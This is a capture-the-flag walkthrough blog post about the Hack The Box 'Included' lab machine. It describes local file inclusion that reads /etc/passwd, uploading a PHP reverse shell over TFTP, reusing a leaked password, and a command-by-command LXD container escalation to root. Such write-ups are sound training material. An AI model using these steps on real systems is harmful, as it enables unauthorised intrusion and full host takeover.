Included has been Pwned!

This image shows the Hack The Box machine Included

Ok it’s time to hack another machine from the Hack The Box Starting Point series. We have already managed to hack ArchetypeOopsie, Vaccine, Shield and Pathfinder. Today we are looking at the Included machine. This was a really fun box despite a frustrating ending. This box is fairly simple to start off with provided you notice everything that is going on.


So first of all we ping the box to see if it’s up.

└──╼ [★]$ sudo ping | tee -a ping.txt
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=63 time=21.5 ms

Next we run our nmap scan.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- | tee -a nmap.
Starting Nmap 7.91 ( ) at 2021–09–11 16:30 BST
Nmap scan report for
Host is up (0.022s latency).
Not shown: 65535 closed ports
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn’t have a title (text/html; charset=UTF-8).
|_Requested resource was
No exact OS matches for host (If you know what OS is running on it, see ).

Ok so only a webserver is running, or is it? So I went to poke at the website and immediately saw that the website was calling the index.php using a file parameter. Caught my eye because it seemed like quite an obvious naming convention for accessing files. So naturally I pointed it straight at the /etc/passwd file and immediately had the file returned back to me.

This is an image of the titan gears website that we are trying to hack.
Hack The Box Included File Inclusion
This is an image showing local file inclusion hack on the titan gears website.
Hack The Box Included /etc/passwd

Sweet where now? Well as other guides have mentioned, there is an interesting user in the /etc/passwd file. As you can see from the tool ouput below, the user tftp exists at the very bottom of the file with the home directory of /var/lib/tftpboot.

cat /mnt/root/etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin

Interesting, I confirmed that TFTP was open, it listens on UDP rather than TCP which is why our Nmap scan missed it. At this point I would also like to point out that Nessus missed the TFTP service too. It also missed the directory traversal vulnerability which I also felt was odd since I asked it to san for web vulnerabilities. Nikto also missed the directory traversal vulnerability so this is an important lesson that you can’t always rely on tools

This image shows Nessus scan results which doesn't really show that there is anything to hack.
Hack The Box Nessus Output

Foothold Hack

Anyway I’m getting side tracked. I pinched the tried and tested pentestmonkey/php-reverse-shell and configured it for my IP address and port. I then uploaded the file to the machine using tftp.

└──╼ [★]$ tftp
tftp> put phpshell.php phpshell.php
Sent 5681 bytes in 0.4 seconds

Once that was uploaded to the server I created my netcat listener and then ran curl against the URL to get a shell.

└──╼ [★]$ curl

I checked out the history and ran a few other tools but nothing of much interest. There was a user called mike by listing out the /home directory. I guess this is the user we need to escalate to, to proceed further. It looks like mike has the user.txt flag in his home directory to so this confirmed my suspicious. After failing for a while I decided to try and switch user to Mike using the password found on the previous machine Pathfinder. Yeah it worked.

bash-4.4$ ls /home/mike
ls /home/mike
alpine-v3.14-x86_64–20210909_2211.tar.gz user.txt
bash-4.4$ cat /home/mike/user.txt
cat: /home/mike/user.txt: Permission denied
bash-4.4$ su mike
su mike
Password: Sheffield19

With that I was able to capture the user flag.

bash-4.4$ cat /home/mike/user.txt
cat /home/mike/user.txt

So what next? Well it was time to perform some more enumeration on the machine. I grabbed a copy of Linpeas and hosted on my machine using Python’s simple http server. I then downloaded the script and ran it. Unfortunately, my VM crashed before I had chance to save the output but it turns out mike is a member of the lxd group.

At this point I checked the official walkthrough and attempted to follow the instructions. However for whatever reason I couldn’t get the lxd-alpine-builder script to work at all. Every time I ran the script, I just kept getting an error message telling me there was an invalid parameter. I tried to strace the script but the information it provided wasn’t much help either.

Privilege Escalation Hack

After a bit of google fu I found this awesome article by that essentially does the same thing but differently. So, I got to following the instructions there and created the image.

sudo su
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
sudo go get -d -v
cd $HOME/go/src/
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

With the image and the rootfs.squashfs file ready, I started the python server again and downloaded the files from my local machine to the Included machine.

[email protected]:~$ wget
2021–09–11 18:02:14 —
Connecting to… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2318336 (2.2M) [application/octet-stream]
Saving to: ‘rootfs.squashfs’
rootfs.squashfs 100%[===================>] 2.21M 3.17MB/s in [email protected]:~$ wget
2021–09–11 18:03:40 —
Connecting to… connected.
HTTP request sent, awaiting response… 200 OK
Length: 884 [application/x-xz]
Saving to: ‘lxd.tar.xz’
lxd.tar.xz 100%[===================>] 884 — .-KB/s in 0.005s

With the files now on the machine, I imported the image, configured it and ran it.

[email protected]:~$ lxc image import lxd.tar.xz rootfs.squashfs — alias alpine
mike@included:~$ lxc init alpine privesc -c security.privileged=true
lxc init alpine privesc -c security.privileged=true
Creating privesc
[email protected]:~$ lxc list
lxc list
+ — — — — -+ — — — — -+ — — — + — — — + — — — — — — + — — — — — -+
+ — — — — -+ — — — — -+ — — — + — — — + — — — — — — + — — — — — -+
| privesc | STOPPED | | | PERSISTENT | 0 |
+ — — — — -+ — — — — -+ — — — + — — — + — — — — — — + — — — — — [email protected]:~$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
<st-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
[email protected]:~$ lxc start privesc
lxc start privesc
[email protected]:~$ lxc exec privesc /bin/sh
lxc exec privesc /bin/sh

While the shell wasn’t pretty, it did have root access and I was able to capture the final flag.

cd /mnt/root/root
/mnt/root/root # ^[[43;18Rcat root.txt
cat root.txt
This image shows the included machine that we were trying to hack being pwned!
Hack The Box Included Has Been Pwned!